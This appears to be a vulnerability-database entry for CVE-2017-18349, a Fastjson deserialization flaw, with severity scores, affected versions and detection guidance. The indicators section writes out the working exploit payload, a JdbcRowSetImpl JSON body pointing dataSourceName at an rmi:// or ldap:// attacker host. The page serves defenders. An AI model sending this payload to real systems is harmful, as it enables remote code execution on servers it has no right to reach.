cbcvebase.
CVE-2017-18349
published 2018-10-23

CVE-2017-18349: parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a…

PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
38.97%
98.4th percentile
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.

Affected

3 ranges
VendorProductVersion rangeFixed in
alibabafastjson< 1.2.481.2.48
alibabafastjson< 1.2.251.2.25
pippopippo

Detection & IOCsextracted from sources · hover to see the quote

url/json
url/api/json
url/parse
url/deserialize
command{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://<attacker>/", "autoCommit": true}
command{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://<attacker>/", "autoCommit": true}
othercom.sun.rowset.JdbcRowSetImpl
sigma
condition: contains(interactsh_protocol,'dns') AND contains(content_type,'application/json') AND contains_all(body,'autoCommit','set property error')
  • Look for HTTP POST requests to /json, /api/json, /parse, or /deserialize endpoints with Content-Type: application/json containing the @type key set to com.sun.rowset.JdbcRowSetImpl and a dataSourceName field containing an rmi:// or ldap:// URI pointing to an attacker-controlled host.
  • Detect the error response string 'set property error' alongside 'autoCommit' in the response body, which indicates the vulnerable Fastjson code path was triggered.
  • Monitor for outbound DNS or LDAP/RMI connections originating from the Java process after receiving a JSON payload containing @type with com.sun.rowset.JdbcRowSetImpl — this indicates successful JNDI injection triggering an out-of-band callback.
  • Flag any JSON body containing the literal string @type with value com.sun.rowset.JdbcRowSetImpl regardless of nesting depth (top-level, inside 'data' key, or inside 'b' key), as the exploit template demonstrates multiple wrapping variants.
  • This vulnerability exists because of Fastjson's autoType feature mishandling @type keys; detection should also cover LDAP-based JNDI injection payloads in the dataSourceName field, as the same class is exploitable via ldap:// URIs.
  • ·The Nuclei template uses interactsh (OOB/OAST) for DNS callback detection; this detection method requires an active interactsh server and will not fire in air-gapped or DNS-filtered environments.
  • ·The exploit is demonstrated against Pippo's /json endpoint but the vulnerable parseObject function is in Fastjson itself; any application using Fastjson before 1.2.25 with autoType enabled is affected regardless of framework or endpoint path.
  • ·The fix in 1.2.25 was incomplete; Fastjson before 1.2.48 remains vulnerable to autoType mishandling leading to JNDI injection, and a further bypass is tracked as CVE-2022-25845.
  • ·The stop-at-first-match flag in the Nuclei template means only the first matching endpoint is tested per request sequence; in production scanning, all candidate paths (/json, /api/json, /parse, /deserialize) should be tested independently.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.